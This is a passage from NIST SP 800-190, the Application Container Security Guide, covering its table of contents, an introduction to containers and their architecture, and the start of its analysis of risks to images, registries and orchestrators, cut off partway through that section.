4.2.3 Insufficient authentication and authorization restrictions  .................... 21 
4.3 Orchestrator Countermeasures  .................................................................... 22 
4.3.1 Unbounded administrative access  ...................................................... 22 
4.3.2 Unauthorized access  .......................................................................... 22 
4.3.3 Poorly separated inter -container network traffic  .................................  22 
4.3.4 Mixing of workload sensitivity levels  ................................................... 23 
4.3.5 Orchestrator node trust  ....................................................................... 24 
4.4 Container Countermeasures  ......................................................................... 24 
4.4.1 Vulnerabilities within the runtime software .......................................... 24 
4.4.2 Unbounded network access from containers  ...................................... 24 
4.4.3 Insecure container runtime configurations  .......................................... 25 
4.4.4 App vulnerabilities  .............................................................................. 25 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
ix 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 4.4.5 Rogue containers  ............................................................................... 26 
4.5 Host OS Countermeasures  ........................................................................... 26 
4.5.1 Large attack surface  ........................................................................... 26 
4.5.2 Shared kernel  ..................................................................................... 27 
4.5.3 Host OS component vulnerabilities  .................................................... 27 
4.5.4 Improper user access rights  ............................................................... 27 
4.5.5 Host file system tampering  .................................................................  27 
4.6 Hardware Countermeasures  ......................................................................... 28 
5 Container Threat Scenario Examples .................................................................  30 
5.1 Exploit of a Vulnerability within an Image  ...................................................... 30 
5.2 Exploit of the Container Runtime .................................................................. 30 
5.3 Running a Poisoned Image ........................................................................... 30 
6 Container Technology Life Cycle Security Considerations ............................. 32 
6.1 Initiation Phase  ............................................................................................. 32 
6.2 Planning and Design Phase  .......................................................................... 32 
6.3 Implementation Phase .................................................................................. 33 
6.4 Operations and Maintenance Phase ............................................................. 34 
6.5 Disposition Phase  ......................................................................................... 35 
7 Conclusion ........................................................................................................... 36 
 
List of Appendices  
Appendix A — NIST Resources for Securing Non- Core Components .................... 38 
Appendix B — NIST SP 800 -53 and NIST Cybersecurity Framework Security 
Controls Related to Container Technologies ........................................................... 39 
Appendix C — Acronyms and Abbreviations ............................................................ 46 
Appendix D — Glossary  .............................................................................................. 48 
Appendix E — References  ........................................................................................... 50 
 
List of Tables and Figures  
Figure 1: Container Technology Architecture Tiers and Components  .............................iv  
Figure 2: Virtual Machine and Container Deployments  ................................................... 5 
Figure 3: Container Technology Architecture Tiers, Components, and Lifecycle Phases  8 
Table 1: NIST Resources for Securing Non- Core Components  .................................... 38 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
x 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Table 2: Security Controls from NIST SP 800 -53 for Container Technology Security  ... 39 
Table 3: NIST SP 800 -53 Controls Supported by Container Technologies  ................... 43 
Table 4: NIST Cybersecurity Framework Subcategories Supported by Container 
Technologies  .......................................................................................................... 43 
 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
1 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 1 Introduction 
1.1 Purpose and Scope 
The purpose of the document  is to explain the security concerns associated with application 
container technologies  and make practical recommendations for addressing those  concerns when 
planning for, implementing, and maintaining containers . Some aspects of containers may vary 
among technologies, but t he recommendations in this document are intended to apply to most or 
all application container technologies .   
All forms of virtualization other than application containers , such as virtual machines, are 
outside the scope of this document.  
In addition to application container technologies, the term “container” is used to refer to concepts 
such as software that isolat es enterprise data from personal data on mobile devices, and software 
that may be used to isolate applications from each oth er on desktop operating systems. While 
these may share some attributes with application container technologies, they are out of scope for 
this document. 
This document assumes readers are already familiar with securing the technologies supporting 
and intera cting with application container technologies. These include  the following:  
• The layers under application container technologies, including hardware, hypervisors, 
and operating systems ; 
• The administrative tools  that use the applications within the containe rs; and  
• The administrator endpoints used to manage the applications within the containers and 
the containers themselves. 
Appendix A contains pointers to resources with information on securing these technologies. 
Sections 3 and 4 offer additional information on security considerations for container -specific 
operating systems. All f urther discussion of securing the  technologies listed above is out of scope 
for this document.  
1.2 Document Structure  
The remainder of this document is organized into the following sec tions  and appendices :  
• Section 2 introduces  containers, including their technical capabi lities, technology 
architectures, and use s. 
• Section 3 explains the major risks for the core components of application container 
technologies. 
• Section 4 recommends  countermeasures for the risks identified in Section 3. 
• Section 5 defines threat scenario examples for containers.  
• Section 6 presents actionable information for planning, implementing , operating, and 
maintaining  container technologies . 
• Section 7 provides t he conclusion for  the document.  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
2 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 • Appendix A lists NIST resources for securing non -core components of  container 
technolog ies. 
• Appendix B  lists the NIST Special Publication 800 -53 security controls and NIST 
Cybersecurity Framework subcategories that are most pertinent to application container 
technologies, explaining the relevancy of each. 
• Appendix C  provides an acronym and abbreviation list for the document. 
• Appendix D  presents a glossary of selected terms from the document.  
• Appendix E  contains a list of references for the document.  
  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
3 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 2 Introduction to Application Container s  
This section provides an introduction to containers for server  application s (apps) . First, it defines 
the basic concepts for application virtualization and containers needed to understand the rest of 
the document . Next, this section  explains how  containers  interact with the operating system they 
run on top of. The next portion of the section illustrates the overall architecture of container 
technologies, defi ning all the major components typically found in a container implementation 
and explaining the workflows between components . The last part  of the section describes 
common uses for containers.  
2.1 Basic Concepts for Application Virtualization and Containers 
NIST Special Publication ( SP) 800- 125 [1] defines virtualization  as “the simulation of the 
software and/or hardware upon which other software runs.” Virtualization has been in use for 
many years , but it is best known for enabling cloud computing. In cloud environments, hardware  
virtualization  is used to run many instances of operating systems  (OSs) on a single physical 
server  while keeping each instance separate. This allows more efficient  use of hardware  and 
support s multi -tenancy.   
In hardware  virtualization, each OS  instance interacts with virtualized hardware. Another form of 
virtualization known as operating system virtualization has a similar concept; it provides 
multiple virtualized OS s above a single actual OS  kernel. This approach is often called an OS 
container , and various implementation s of OS containers have existed since the early 2000s, 
starting with S olaris Zone and FreeBSD jails.1 Support initially became available in Linux in 
2008 with the Linux Container ( LXC)  technology built into ne arly all modern distributions. OS 
containers are different from the application containers that are the topic of this guide because 
OS containers are designed to provide an environment that behaves much like a normal OS  in 
which multiple apps and services may co -exist.  
Recently, application virtualization has become increasingly popular due to advances in its ease 
of use and a greater  focus on developer agility as a key benefit. In application virtualization, th e 
same shared OS  kernel is exposed virtually to multiple discrete apps. OS  components  keep each 
app instance isolated from all others on the server.  In this case, each app sees only the OS and 
itself, and is  isolated from other apps that may be running on this same OS  kernel .   
The key difference between OS  virtualization and application virtualization is that with 
application  virtualization, each virtual instance typically runs only  a single app. Today’s 
application  virtualization technologies are primarily focused on providing a portable, reusable, 
and automatable way to package and run apps. The  term s application container  or simply  
container  are frequently used to refer to these technologies. The term is meant as an analogy to 
shipping containers , which provide a standardized way of grouping disparate contents together 
while isolating them from each other.  
                                                 
1  For more information on the concept of jails, see https://www.freebsd.org/doc/handbook/jails.html .  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
4 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Unlike traditional app architectures, which often divide an app into a few tiers (e.g., web, app, 
and database) and have a server or VM  for each  tier, container architectures often have a n app 
divided into many more components , each with a single well -defined function and typically 
running in its own container(s) . Each app component runs in a separate container. In application 
container technologi es, sets of containers that work together to compose an app are referred to as 
microservices. With this approach, app deployment is more flexible and scalable . Development 
is also simpler  because functionality is more self -contained. However, there are man y more 
objects to manage and secure, which may cause problems for app management and security tools  
and processes.  
Most application container technologies implement the concept of immutability. In other words, 
the containers themselves should be operated a s stateless entities that are deployed but not 
changed.2 When a running container needs to be upgraded or have its contents changed, it is 
simply destroyed and replaced  with a new container  that has  the updates. This enables  
developers and support engineers to make and push changes to apps at a much faster  pace. 
Organizations may go from deploying a new version of their app every quarter, to deploying new 
components weekly or daily. Immutability is a fundamental operational d ifference between 
containers and hardware virtualization. Traditional VMs are typically run as stateful entities that 
are deployed, reconfigured, and upgraded throughout their life. Legacy security tools and 
processes often assume largely static operations and may need to be adjusted to adapt to the rate 
of change in containerized environments.  
The immutable nature of containers also has implications for data persistence. Rather than 
intermingling the app with the data it uses, containers stress the concept of isolation. Data 
persistence should be achieved not through simple writes to the container  root file system , but 
instead by using external, persistent data stores such as databases or cluster -aware persistent 
volumes. T he data containers use should be stored outside of the containers themselves so  that 
when the next version of an app replaces the containers running the existing version, all data is 
still available to the new version.  
Modern container technologies have largely emerged along with the adoption of development 
and operations  (DevOps)  practices that seek to increase the integration between building and 
running apps, emphasizing close coordination between development and operational teams.3 The 
portable and declarative nature of containers is p articularly well suited to these practices because 
they allow an organization to have great consistency between development, test, and production 
environments. Organizations often utilize continuous integration processes to put their apps into 
containers d irectly in the build process itself, such that from the very beginning of the app’s 
lifecycle, there is guaranteed consistency of its runtime environment.  Container i mages—
packages containing the files required to run container s—are typically designed to be portable 
across machines and environments, so that an image created in a development lab can be easily 
moved to a test lab for evaluation, then copied into a production environment to run without 
needing to make any modifications . The downside of this is  that the security tools and processes 
                                                 
2  Note that while containers make immutability practical and realistic, they do not require  it, so organizations need to adapt 
their operational practices to take advantage of it.  
3  This document refers to t asks performed by DevOps personas. The references to these personas are focused on the types of 
job tasks being performed, not on strict titles or team organizational structures.  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
5 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 used to protect containers  should not make assumptions about specific cloud providers, host OSs, 
network topologies, or other aspects of the container runtime environment which may frequently 
change. Even more critically, security should be consistent across all these environments and 
throughout the app lifecycle from development to test to production.  
Recently, projects such as Docker  [2] and rkt [3 ] have provided additional functionality designed 
to mak e OS  component isolation features easier to use and scale. Container technologies are also 
available on the Windows platform  beginning with Windows Server 2016. The fundamental 
architecture of all these implementations is consistent enough so that this document can discuss 
containers in detail  while remaining  implementation agnostic.  
2.2 Container s and the Host Operating System  
Explaining the deployment of  apps within containers is made easier by comparing it with the 
deployment  of apps within virtual machines  (VMs) from hardware virtualization technologies , 
which many readers are already familiar with. Figure 2 shows the VM  deployment on the left , a 
container deployment  without  VMs  (installed on “bare metal”)  in the middle, and a container 
deployment  that runs within a VM on the right . 
 
Figure 2: Virtual Machine and Container Deployments  
Both VMs and containers allow multiple apps to share the same physical infrastructure, but they 
use different methods of separation. VMs use a hypervisor t hat provide s hardware -level isolation 
of resources across VMs . Each VM sees its own  virtual hardware  and includes a complete guest 
OS in addition to the app and its data.  VMs allow different OSs , such as Linux and Windows, to 
share the same physical hardware.  
With containers, m ultiple apps share the same OS  kernel instance but are segregated from each 
other. The  OS kernel  is part of what is called the host operating system . The host OS sits below 
the containers and provides OS  capabilities to them . Containers are OS -family speci fic; a Linux 
host can only run containers built for Linux, and  a Windows host can only run Windows 

NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
6 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 containers.  Also , a container built for one OS family should run on any recent OS from that 
family.  
There are two general categories of host OSs used for running containers . General -purpose OSs  
like Red Hat Enterprise Linux, Ubuntu, and Window s Server can be used for running many 
kinds of apps and can have container -specific functionality added to them. Container -specific 
OSs, like CoreOS  Container Linux [4 ], Project Atomic [5 ], and Google Container -Optimized OS 
[6] are minimalistic OSs explicitly designed to only run containers. They typically do not come 
with package managers, they have only a subset of the core administration tools, and they 
actively discourage running apps outside containers. Often, a container -specific OS use s a read -
only file system design to reduce the likelihood of an attacker being able to persist data within it, 
and it also utilize s a simplified upgrade process since there is little concern around app 
compatibility. 
Every  host OS used for running containers has binaries that establish and maintain the 
environment  for each container , also known as the container runtime . The container runtime 
coordinates multiple OS components that isolate resources and resource usage s o that each 
container sees its own dedicated view of the OS and is isolated from other containers running 
concurrently. Effectively, the containers and the host OS interact through the container runtime. 
The container runtime also provides management tools and application programming interfaces 
(APIs) to allow DevOps personnel and others  to specify how to run containers on a given host. 
The runtime eliminates the need to manually creat e all the necessary configurations and 
simplifies the process of starting,  stopping, and operating containers. Examples of runtimes 
include Docker [2 ], rkt [3 ], and the Open Container Initiative Daemon [7]. 
Examples of technical capabilities the container runtime ensures the ho st OS provides include 
the following : 
• Namespace isolation  limits which  resources a container may interact with. This includes 
file systems, network interfaces, interprocess communications, host names, user 
information, and processes. Namespace isolation ensures that apps and processes inside a 
container only see the physical and virtual resources  allocated to that container. For 
example, if you run ‘ps –A’ inside a container running Apache on a host  with many other 
conta iners running other apps, you would only see httpd listed in the results. Namespace 
isolation provides each container with its own networking stack, including unique 
interfaces and IP addresses. Containers on Linux use technologies like masked process 
identities to achieve namespace isolation, whereas on Windows, object namespaces are 
used. 
• Resource allocation  limits how much of a host’s resources a given container can 
consume. For example, if your host OS has 10 gigabytes (GB)  of total memory, you may 
wish  to allocate 1  GB each to nine  separate containers.  No container should be able to 
interfere with the operations of another container , so resource allocation  ensures that each 
container can only utilize the amount of resources assigned to it. On Linux, thi s is 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
7 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 accomplished primarily with control groups (cgroups)4, whereas on Windows job objects 
serve a similar purpose.  
• Filesystem virtualization  allows multiple containers to share the same physical storage 
without the ability to access or alter  the storage of other containers. While arguably 
similar to namespace isolation, filesystem virtualization is called out separately  because it 
also often involves optimizations to ensure that containers are efficiently using the host’s 
storage through techniques like copy -on-write . For example, if multiple containers using 
the same image are running Apache on a single host, filesystem virtualization ensures 
that there is only one copy of the httpd binary stored on disk. If one of the containers 
modifies fil es within itself, only the specifically changed bits will be written to disk , and 
those changes will only be visible to the container that executed them . On Linux, these 
capabilities are provided by technologies like  the Advanced Multi -Layered Unification 
Filesystem  (AUFS ), whereas on Windows they a re an extension of the NT File System  
(NTFS) .  
The technical capabilities of containers vary by host OS  family . Containers are fundamentally a 
mechanism to give each app a unique view of a single OS , so the tools  for achieving this 
separation are largely OS  family -dependent. For example, the methods used to isolate processes 
from each other differ between Linux and Windows. However, while the underlying 
implementation may be different, commonly used container runt imes provide a common 
interface format that largely abstracts these differences from users.  
While containers provide a strong degree of isolation, they do not offer as clear and concrete of a 
security boundary as a VM. Because containers share the same ker nel and can be run with 
varying capabilities and  privilege s on a host, the degree of segmentation between them is far less 
than that provided to VMs by a hypervisor. Thus, carelessly configured environments can result 
in containers having the ability to interact with each other and the host far more easily and 
directly than multiple VMs on the same host.  
Although containers are sometimes thought of as the next phase of virtualization, surpassing 
hardware virtualization, the reality for most organizations is less about revolution than evolution. 
Containers and hardware virtualization not only can, but very frequentl y do, coexist well and 
actually enhance each other’s capabilities. VMs provide many benefits, such as strong isolation, 
OS automation, and a wide and deep ecosystem of solutions. Organizations do not need to make 
a choice between containers and VMs. Instead, organizations can continue to use VMs to deploy, 
partition, and manage their hardware, while using containers to package their apps and utilize 
each VM more efficiently.  
2.3 Container Technology Architecture 
Figure 3 shows the five tiers of the container technology architecture:  
                                                 
4  cgroups  are collections of processes that can be managed independently, gi ving the kernel the software -based ability to 
meter subsystems such as memory, processor usage, and disk I/O. Administrators can control these subsystems either 
manually or programmatically.  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
8 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 1. Developer systems (generat e images and send them to testing and accreditation ) 
2. Testi ng and accreditation system s (validate and verify  the conten ts of images, sign 
images, and send images to the registry ) 
3. Registries (store  images and distribut e images to the orchestrator upon request)  
4. Orchestrators (convert images into containers and deploy containers to hosts)  
5. Hosts (run and stop containers as directed by the orchestrator)  
Although there are many administrator system personas involved in the overall process, the 
figure depicts only the administrator system s for the internal registry and the orchestrator.  
The systems in gray (developer systems, testing and accreditation system,  and administrator 
systems) are outside the scope of the container technology architecture, but they do have 
impo rtant interactions with it.  In most organizations that use containers, the development and test 
environments also leverage containers, and this consistency is one of the key benefits of using 
containers. This document does  not focus on systems in these env ironments  because the 
recommendations  for securing them  are largely the same as those  for the production 
environment. The systems in green (internal registry, external registry, and orchestrator) are core 
components of a container technology architecture. Finally, the systems in orange (hosts with 
containers) are where the containers are used.  
Another way to understand the container technology architecture is to consider the container 
lifecycle phases, which are depicted at the bottom of Figure 3. The three phases are discussed in 
more detail below. 
Because organizations are typically building and deploying many different apps at once, these 
lifecycle phases often occur concurrently within the same organization and should not be seen as 
progressive stages of maturity. Instead, think of them as cycles in an engine that is continuously 
running. In this metaphor, each app is a cylinder within the engine, and different apps m ay be at 
different phases of this lifecycle at the same time.    Figure 3: Container Technology Architecture Tiers, Components, and Lifecycle Phases  

NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
9 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 2.3.1 Image Creation, Testing, and Accreditation 
In the first phase of the container lifecycle, an app’s components are built and placed into an 
image  (or perhaps into multiple images). An i mage  is a package that contains  all the files 
required to run a container. For example, an image to run Apache would include the httpd binary, 
along with associated libraries and configuration files. A n image  should only include the 
executables and libraries requ ired by the app itself; all other OS functionality is provided by the 
OS kernel within the underlying host OS. Images often use techniques like layering and copy- on-
write  (in which shared master images are read only and changes are recorded to separate fil es) to 
minimize their size on disk and improve operational efficiency. 
Because images are built in layers, the underlying layer upon which all other components are 
added is often called the base layer. Base layers are typically minimalistic distributions o f 
common OSs  like Ubuntu and Windows Nano Server  with the OS kernel omitted . Users begin 
building their full images by starting with one of these base layers, then adding application 
frameworks and their own custom code to develop a fully deployable image of their unique app. 
Container runtimes support using images from within the same OS family, even if the specific 
host OS version is dissimilar. For example, a Red Hat host running Docker can run images 
created on any Linux base layer, such as Alpine or Ubuntu. However, it cannot run images 
created with a Windows base layer.  
The image creation process is managed by developers responsible for packaging an app for 
handoff to testing. Image creation  typically uses build management and automation tools, such as  
Jenkins [8 ] and TeamCity [9 ], to assist with what is called the “continuous integration” process. 
These tools take the various libraries, binaries, and other components of an app, perform testing 
on them, and then assemble images out of them  based on the developer -created manifest that 
describes how to build an image for the app.  
Most container technologies have a declarative way of describing the components and 
requirements for the app. For example, an image for a  web server would include not only the 
executables for the web server, but also some machine -parseable data to describe how the web 
server should run, such as the ports it listens on or the configuration parameters it uses.  
After image creation, organizations typically perform testing and accreditation. For example, test 
automation tools and personnel  would use the images built to validate the functionality of the 
final form application , and security teams would perform accreditation on these same images. 
The consistency of building, testing, and accrediting exactly the same artifacts for an app is one 
of the key operational and security benefits of containers.  
2.3.2 Image Storage and Retrieval 
Images are typically stored in central locations to make it easy to co ntrol, share, find, and reuse 
them across hosts. Registries are services that allow developers to easily store images as they are 
created, tag and catalog images for identification and version control to aid in discovery and 
reuse, and find and download im ages that others have created. Registries may be self -hosted or 
consumed as a service. Examples of registries include Amazon EC2 Container Registry [10 ], 
Docker Hub [11 ], Docker Trusted Registry [12 ], and Qua y Container Registry [13 ]. 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
10 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Registries provide APIs that enable automat ing common image -related tasks.  For example, 
organizations may have triggers in the image creation phase that automatically push images to a 
registry once tests pass. The registry may have further triggers that automate the deployment of 
new images once they have been added. This automation enables faster iteration on projects with 
more consistent results.  
Once stored in a registry, images can be easily pulled and then run by DevOps personas across 
any environment in which they run containers. This is another example of the portability benefits 
of containers; image creation  may occur in a public cloud provider, which pushes an image to a 
registry hosted in a private cloud, which is then used to distribute images for running the app in a 
third location.   
2.3.3 Container Deployment  and Management  
Tools known as orchestrators enable DevOps  personas or automation working on their behalf to 
pull images from registries, deploy those  images into containers, and manage the running 
containers.  This deployment process is what actually results in a usable version of the app, 
running and ready to respond to requests. When an image is deployed into a container, the image 
itself is not chang ed, but instead a copy of it is placed within the container and transitioned from 
being a dormant set of app code to a running instance of the app. Examples of orchestrators are 
Kubernetes [14], Mesos [15 ], and Docker Sw arm [16].  
Note that a small, simple container implementation could omit a full -fledged orchestrator. 
Orchestrators may also be circumvented or unnecessary in other circumstances. For example, a 
host could directly contact a registry in o rder to pull an image from it for a container runtime. To 
simplify the discussions in this publication, the use of an orchestrator will be assumed.  
The abstraction provided by an orchestrator allows a DevOps persona  to simply specify  how 
many containers need to be running a given image and what resources, such as memory, 
processing, and disk need to be allocated to each. The orchestrator knows the state of each host 
within the cluster, including what resources are available for each host, and determines which 
containers will run on which hosts. The orchestrator then pulls the required images from the 
registry and runs them as containers with the designated resources.  
Orchestrat ion tool s are also responsible for monitoring container reso urce consumption, job 
execution, and machine health across hosts . Depending on its configuration, an orchestrator may 
automatically restart containers on new hosts if the hosts they were initially running on failed. 
Many orchestrators enable cross- host container networking and service discovery. Most 
orchestrators also include a software -defined networking (SDN) component known as an overlay 
network that can be used to isolate communication between apps that share the same physical 
network.  
When  apps in containers need to be updated, the existing containers are not changed, but rather 
they are destroyed and new containers created from updated images. This is a key operational 
difference with containers: the baseline software from the initial deployment shou ld not change 
over time, and updates are done by replacing the entire image at once. This approach has 
significant potential security benefits because it enables organizations to build, test, validate, and 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
11 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 deploy exactly the same software in exactly the same configuration in each phase. As updates are 
made to apps, organizations can ensure that the most recent versions are used, typically by 
leveraging orchestrators . Orchestrators are usually configured to pull the most up- to-date version 
of an image from t he registry so that the app is always up -to-date. This “continuous delivery” 
automation enables developers to simply build a new version of the image for their app, test the 
image, push it to the registry, and then rely on the automation tool s to deploy it  to the target 
environment.  
This means that all vulnerability management, including patches and configuration settings, is 
typically taken care of by the developer when building a new image version. With containers, 
developers are largely responsible for the security of apps and images instead of the operations 
team. This change in responsibilities often requires much greater coordination and cooperation 
among personnel than was previously necessary. Organizations adopting containers should 
ensure that clear process flows and team responsibilities are established for each stakeholder 
group. 
Container management includes security management and monitoring. However , security 
controls designed for non- container environments are often not well suited for use with 
containers. For example, consider security controls that take IP addresses into account. This 
works well for  VMs and bare metal servers with  static IP addresses that  remain the  same for 
months or years. Conversely, containers are typically allocated IP addresses by orchestrators, and 
because containers are created and destroyed much more frequently than VMs, these IP 
addresses change frequently over time as well. This makes it difficult or impossib le to protect 
containers using security techniques that rely on static IP addresses, such as firewall rulesets 
filtering traffic based on IP address. Additionally, a container network can include 
communications between containers on the same node, across d ifferent nodes, and even across 
clouds.  
2.4 Container Uses  
Like any other technology, containers are not a panacea. They are a valuable tool for many 
scenarios, but are not necessarily the best choice for every scenario.  For example, an 
organization with a large base of legacy off -the-shelf software is  unlikely to be able to take 
advantage of containers for running most of that software since the vendors may not support it. 
However, most organizations will have multiple valuable use s for containers.  Examples  include:  
• Agile development , where apps are frequently updated and deployed. The portability and 
declarative nature of containers makes these frequent updates more efficient and easier to 
test. This allows organizations to accelerate their innovation and deliver software more 
quickly. This also allows vulnerabilities in app code to be fixed and the updated software 
tested  and deployed much faster.  
• Environmental consistency and compartmentalization, where developers can have 
identical yet separate environments for building, testing, and running the app. Containers 
give developers the ability to run the entirety of an exact copy of a production app lo cally  
on a development laptop system , limiting the need for coordination and sharing of testing 
environments as well as eliminating the hassl e of stale testing environments. 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
12 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 • ‘Scale out’ scenarios, where an app may need to have many new instances deployed or 
decommissioned quickly depending on the load at a given point in time. The 
immutability of containers makes it easier to reliably scale out instances, knowing that 
each instance is exactly like all the others.  Further, because containers are typically 
stateless, it  is easier to decommission them when they  are no longer needed. 
• Cloud- native  apps, where developers can build for a microservices architecture from the 
beginning, ensuring more efficient iteration of the app and simplified deployment . 
Containers  provide additional benefits; for example, they can increase the effectiveness of build 
pipelines due to the immutable nature of container images. Containers shift the time and location 
of production code installation. In non- container systems, app install ation happens in production 
(i.e., at server runtime), typically by running hand- crafted scripts that manage installation of app 
code (e.g., programming language runtime, dependent third- party libraries, init scripts, and OS 
tools) on servers. This means t hat any tests running in a pre -production build pipeline (and on 
developers’ workstations) are not testing the actual production artifact, but a best -guess 
approximation contained in the build system. This approximation of production tends to drift 
from pr oduction over time, especially if the teams managing production and the build system are 
different. This scenario is the embodiment of  the “it works on my machine” problem.  
With  container  technologies , the build system installs the app within the image it creates (i.e., at 
compile -time). The image is an immutable snapshot of all userspace requirements of the app 
(i.e., programming language runtime, dependent third -party libraries, init scripts, and OS tools). 
In production the container image constructed by the build system is simply downloaded and 
run. This solves the “works on my machine” problem since the developer, build system, and 
production all run the same immutable artifact.  
Modern container technologies often also emphasize reuse, such that a conta iner image created 
by one developer can be easily shared and reused by other developers, either within the same 
organization or among other organizations . Registry services provide centralized image sharing 
and discovery services to make it easy for developers to find and reuse software created by 
others. This ease of use is also leading many popular software vendors and projects to use 
containers as a way  to make it easy for customers to find and quickly run their software. For 
example, rather than directly installing an app like MongoDB on the host OS, a user can simply 
run a container image of MongoDB. Further, since the container runtime isolates contai ners from 
one another and the host OS, these apps can be run more safely and reliably, and users do not 
have to worry about them disturbing the underlying host OS . 
 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
13 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 3 Major Risks for Core Components of Container  Technologies  
This section identifies and analyzes major risks for the core components of container 
technolog ies—images, registries, orchestrators, containers, and host OSs . Because th e analysis 
looks at core components  only, it is applicable to most cont ainer deployments  regardless of 
container technology, host OS platform, or location (public cloud, private cloud, etc.)  Two  types 
of risks  are considered : 
1. Compromise of an image or container. This risk was evaluated using the data -centric 
system t hreat m odeling approach described in NIST SP 800- 154 [17 ]. The primary “data” 
to protect is the images and containers, which may hold app files, data files, etc. The 
secondary data to protect is container data within shared host resources such as memory, 
storage, and network interfaces.  
2. Misuse of a container to attack other containers, the host OS, other hosts, etc.  
All o ther risks involving the core components, as well as risks involving non- core container 
technology components, including developer systems, testing and accreditation systems, 
administrator systems, and host hardware and virtual machine managers , are outside the scope of 
this document. Appendix A contains pointers to general referen ces for securing non- core 
container technology components .  
3.1 Image Risks 
3.1.1 Image vulnerabilities 
Because images are effectively static archive files that include all the components used to run a 
given app, components within an image may be missing critical security updates or are otherwise 
outdated. An  image created with fully up- to-date components may be free of known 
vulnerabilities for days or weeks after its creation , but at some time  vulnerabilities will be 
discovered in one or more image components, and thus the image will no longer be up- to-date.  
Unlike traditional operational patterns in which deployed software is updated ‘in the field’ on the 
hosts it runs on, with containers these updates must be made upstream in the images themselves, 
which are then redeployed. Thus, a common risk in containerized environments is deployed 
containers having vulnerabilities because the version of the image used to generate the containers  
has vulnerabilities .  
3.1.2 Image configuration defects 
In addition to software defects , images may also have configuration defects. For example, an 
image may not be configured with a specific user account to “run as ” and thus run with greater 
privileges than needed . As another example, an image may include an SSH daemon, which 
exposes the container to unnecessary network risk. Much like in a traditional server or VM, 
where a poor configuration can still expose a fully up- to-date system to attack, so too can a 
poorly configured image increase risk even if all the included components are up- to-date.   
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
14 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 3.1.3 Embedded malware 
Because images are just collections of files packaged together, malicious files could be included 
intentionally or inadvertently within them. Such malware would have the same capabilities as 
any other component within the image and thus could be used to attack other containers or hosts 
within the environment. A possible source of embedded malware is the use of base layers and 
other images provided by third parties of which the full provenance is not known. 
3.1.4 Embedded clear text secret s 
Many apps require secrets to enable secure communication between components. For example, a 
web app may need a username and password to connect to a backend database. Other examples 
of embedded secrets include connection strings, SSH private keys, and X.509 private keys. 
When an app is packaged into an image , these secrets can be embedded directly into the image 
file system . However, this practice creates a security risk because anyone with access to the 
image can easily parse it to learn these secrets.  
3.1.5 Use of untrusted images 
One of the most common high- risk scenarios in any environment is the execution of untrusted 
software. The portability and ease of reuse of containers increase the temptation for teams to run 
images from external sources that may not  be well validated or trustworthy. For example, when 
troubleshooting a problem with a web app, a user may find another version of that app available 
in an image provided by a third party. Using this externally provided image results in the same 
types of ri sks that external software traditionally has, such as introducing malware, leaking data, 
or including components with vulnerabilities.  
3.2 Registry Risks 
3.2.1 Insecure connections to registries 
Images often contain sensitive components like an organization’s propri etary software and 
embedded secrets. If connections to registries are performed over insecure channels, the contents 
of images are subject to the same confidentiality risks as any other data transmitted in the clear.  
There is also an increased risk of man -in-the-middle attacks that could intercept network traffic 
intended for registries and steal developer or administrator credentials  within that traffic , provide 
fraudulent or outdated images to orchestrators, etc.  
3.2.2 Stale images in registries 
Because registr ies are typically the source location for all the images an organization deploys, 
over time the set of images they store can include many vulnerable, out -of-date versions. While 
these vulnerable images do not directly pose a threat simply by being stored i n the registry, they 
increase the likelihood of accidental  deployment of a known- vulnerable  version.  
3.2.3 Insufficient  authentication and authorization restrictions 
Because registries may contain images used to run sensitive or proprietary apps and to access 
sensitive data,  insufficient authentication and authorization requirements can lead to intellectual 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
15 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 property loss and expose significant technical details about an app to an attacker. Even more 
critically, because registries are typically trusted as a source of valid, approved software, 
compromise  of a registry can potentially lead to compromise of downstream containers and 
hosts.  
3.3 Orchestrator Risks 
3.3.1 Unbounded administrative access 
Historically, many orchestrators were designed with the assump tion that all users interacting  
with them would be administrators and those administrators should have environment -wide 
control. However, in many cases, a single orchestrator may run many different apps, each 
managed by different teams, and with different sensitivity levels. If the access provided to users 
and groups is not scoped to their specific needs, a malicious or careless user could affect or 
subvert the operation of other containers managed by the orchestrator.  
3.3.2 Unauthorized access  
Orchestrators often include their own authentication directory service, which may be separate 
from the typical directories already in use within an organization. This can lead to weaker 
